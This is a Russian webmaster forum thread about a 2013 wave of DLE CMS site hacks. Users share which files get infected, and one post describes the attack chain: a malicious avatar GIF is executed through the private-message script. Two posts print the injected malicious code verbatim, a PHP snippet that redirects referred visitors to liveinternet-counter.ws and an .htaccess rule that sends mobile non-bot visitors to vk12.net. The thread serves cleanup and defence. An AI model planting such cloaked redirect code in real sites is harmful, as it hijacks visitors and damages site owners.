Вирус на сайте cms dle

P
На сайте с 12.02.2006
Offline
183
#411

А как найти зараженную гифку в папке с автарками? Скопилось порядка 30.000 фото разных форматов, как понять, что конкретно она заражена? Есть какой-нибудь общий признак. Спасибо

RO
На сайте с 25.10.2008
Offline
108
#412
promosite:
А как найти зараженную гифку в папке с автарками? Скопилось порядка 30.000 фото разных форматов, как понять, что конкретно она заражена? Есть какой-нибудь общий признак. Спасибо

Её можно и не найти, т.к картинка может удаляться с сервера после срабатывания...

Если нужно найти и удалить "заразу" пишите в ЛС.

ProLiant
На сайте с 07.12.2005
Offline
249
#413
Fodas:
Спасибо вам большое! Я бы искал еще дольше, но благодаря вам нашел быстро!🍿

Кстати, У меня тоже все заплатки были установлены. 🙅

В основном (часто), вставки кода от статусес.вс и т.п. находятся в:

корне сайта, файлы: .htaccess и index.php

engine/engine.php

engine/init.php

engine/data/config.php

engine/data/dbconfig.php

Еще смотрите в папке language/Russian/website.lng туда тоже вставляется. Только для чего.. :)

Выбирай оптимальный хостинг (http://cp.inferno.name/aff.php?aff=2053) для стабильного заработка на файловом трафе (https://espays.com/s.php?f=38). ;)
Und
На сайте с 16.06.2008
Offline
128
Und
#414

Сегодня тоже обнаружил взлом сайта. Судя по изменённым файлам всё началось 6 февраля. Версия движка 9.3 + патчи. Помимо всего, что здесь описано так же обнаружил код Линкфида у себя на сайте.

ZennoPoster (http://www.zennolab.com/ru/products/zennoposter/pid/ea8c4a97-055c-44e1-b81f-556252ca032d) - автоматизируйте любые задачи в интернете.
R
На сайте с 24.01.2008
Offline
180
#415
Und:
Сегодня тоже обнаружил взлом сайта. Судя по изменённым файлам всё началось 6 февраля. Версия движка 9.3 + патчи. Помимо всего, что здесь описано так же обнаружил код Линкфида у себя на сайте.

Не всегда сам движок виноват взломе! Тут нужно проверять и делать анализ.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
S
На сайте с 10.09.2011
Offline
75
#416
ProLiant:
В основном (часто), вставки кода от статусес.вс и т.п. находятся в:
корне сайта, файлы: .htaccess и index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php
Еще смотрите в папке language/Russian/website.lng туда тоже вставляется. Только для чего.. :)

if(!empty($_SERVER['HTTP_REFERER']) && !isset($_COOKIE['dle_user_hash'])){
$url = @parse_url($_SERVER['HTTP_REFERER']);
if(!empty($url['host']) && $url['host'] != $_SERVER['HTTP_HOST']){
if(!isset($_COOKIE['dle_user_id']) && rand(1,3) == 2){
setcookie("dle_user_hash", md5(uniqid()), time()+(365*24*60*60), "/", $url['host'], false, true);
@header("Location: http://liveinternet-counter.ws");
}
}
}

RewriteEngine   on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://vk12.net/s/11668 [L,R=302]

теперь мошенник использует немного другой код ☝

......
R
На сайте с 11.01.2012
Offline
19
#417
serforall:
if(!empty($_SERVER['HTTP_REFERER']) && !isset($_COOKIE['dle_user_hash'])){

$url = @parse_url($_SERVER['HTTP_REFERER']);
if(!empty($url['host']) && $url['host'] != $_SERVER['HTTP_HOST']){
if(!isset($_COOKIE['dle_user_id']) && rand(1,3) == 2){
setcookie("dle_user_hash", md5(uniqid()), time()+(365*24*60*60), "/", $url['host'], false, true);
@header("Location: http://liveinternet-counter.ws");
}
}
}


RewriteEngine   on

RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://vk12.net/s/11668 [L,R=302]


теперь мошенник использует немного другой код ☝

Да, у меня тоже вчера редиректило на liveinternet-counter.ws; я так понял что редирект происходил через какой то промежуток времени. У кого было сто то подобное - напишите пожалуйста, где искать заразу и как проникает злоумышленник?

T
На сайте с 29.11.2010
Offline
18
#418

Всем добрый день!!! Присоединяюсь к сообществу, поскольку вчера весь вечер потратил на прочтение всех 40-ка страниц темы и на решение проблемы. Всем спасибо за советы, помогли. Кстати у меня такого пользователя на сайте нету, заражен был где-то также в январе приблизительно, вчера только руки дошли... Не думал даже что все настолько масштабно.

Такой вопрос, сайты ломаются только те, которые на VPS или на хостинге тоже? Ато у меня сайт на впс пострадал, а тот, который на хостинге пока не тронут. Еще такой вопрос, я так понимаю, как работает эта славноизвестная гифка пока никому не ясно? А можно ли бекапнуть эту гифку после того, как она была удалена с сайта? Или это из раздела фантастики? )))) Еще раз всем спасибо за помощь!!!

NM
На сайте с 18.02.2011
Offline
181
#419
Toxik:
Такой вопрос, сайты ломаются только те, которые на VPS или на хостинге тоже?

Ломают и те и те. Вчера удалял эту заразу со своего сайта.

https://clck.ru/37jxNm пытаюсь здесь отбить просадку в РСЯ Распродажа сайтов https://docs.google.com/spreadsheets/d/1m63GJQUZMrrhTxT2aoAQBX_722Kte2PfvTQEON_SgGE/
[Удален]
#420

Может, кому пригодится инфа.

Вчера были взломаны 3 сайта:

Порядок действий взломщика следующий:

3.89.222.117 - - [07/Apr/2013:14:32:17 +0400] "POST /index.php?subaction=userinfo&user=freshorangejuice HTTP/1.0" 200 25919 "-" "-"

93.89.222.117 - - [07/Apr/2013:14:32:18 +0400] "GET /index.php?subaction=userinfo&user=freshorangejuice HTTP/1.0" 200 25919 "http://www.site.net/index.php?subaction=userinfo&user=freshorangejuice" "-"

93.89.222.117 - - [07/Apr/2013:14:32:20 +0400] "POST /index.php?subaction=userinfo&user=freshorangejuice HTTP/1.0" 200 25908 "http://www.site.net/index.php?subaction=userinfo&user=freshorangejuice" "-"

93.89.222.117 - - [07/Apr/2013:14:32:21 +0400] "HEAD /uploads/fotos/foto_101.gif HTTP/1.1" 200 0 "http://www.site.net/index.php?subaction=userinfo&user=freshorangejuice" "-"

93.89.222.117 - - [07/Apr/2013:14:32:21 +0400] "POST /engine/ajax/pm.php HTTP/1.0" 200 1907 "http://www.site.net/uploads/fotos/foto_101.gif" "-"

93.89.222.117 - - [07/Apr/2013:14:32:22 +0400] "GET /index.php?subaction=userinfo&user=freshorangejuice HTTP/1.0" 200 25901 "http://www.site.net/engine/ajax/pm.php" "-"

93.89.222.117 - - [07/Apr/2013:14:32:23 +0400] "POST /index.php?subaction=userinfo&user=freshorangejuice HTTP/1.0" 200 25910 "http://www.site.net/index.php?subaction=userinfo&user=freshorangejuice" "-"

Что это означает:

1. Бот регистрируется как пользователь сайта.

2. После регистрации загружает аватар.

3. Через интерфейс отправки приватных сообщений ВЫПОЛНЯЕТ код, загруженный под видом аватара.

4. Удаляет аватар.

Модифицируются именно файлы конфигурации, потому, что на них есть права на запись - 666.

В данной ситуации необходимо срочно запретить загрузку пользователями аватаров и провести обновления DLE.

Кстати, из официальных источников по этой теме: http://dle-news.ru/bags/

"...А также был изменен алгоритм загрузки картинок и автаров, который больше не позволяет использование анимированных картинок .gif. Все загружаемые анимированные картинки будут выводится в виде статических картинок. Данная мера является вынужденной и необходимой, в связи с рядом ограничений формата gif, который не позволяет в достаточной мере отфильтровать вредный код в картинках, единственным эффективным способом является только снятие поддержки анимации в данных картинках."

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий